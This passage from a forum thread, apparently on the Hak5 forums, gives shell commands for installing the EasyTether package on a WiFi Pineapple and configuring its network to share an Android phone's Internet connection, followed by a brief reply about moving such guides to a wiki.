    Then install the application!
    root@Pineapple:/sd/15.05-rc3/ar71xx/generic# opkg install easytether-usb-openssl_0.8.5-1_ar71xx.ipk --dest sd
    After that you can run the application (you do not need to be in any specific directory anymore)
    root@Pineapple:/sd/15.05-rc3/ar71xx/generic# easytether-usb
    Now control-C because the Pineapple doesn't have Internet just yet, you need to configure it to allow Internet sharing from Android by running the below command (all the lines at once).
    cat << EOF >> /etc/config/network
    config interface 'wan'
        option ifname 'tap-easytether'
        option proto 'dhcp'
    EOF
    You should be all set and see "Connection Established" if you followed the Android instructions correctly and have Internet on your Pineapple! If you need more help ask me or read MobileStream's tutorial. Good luck guys!
  50. 1 point
    Yeah it's hard to gauge what to suggest, everyone will be starting at different levels of expertise and wanting to focus on different areas. Perhaps once we gather a bit more content we should shift this to the Hak.5 Wiki?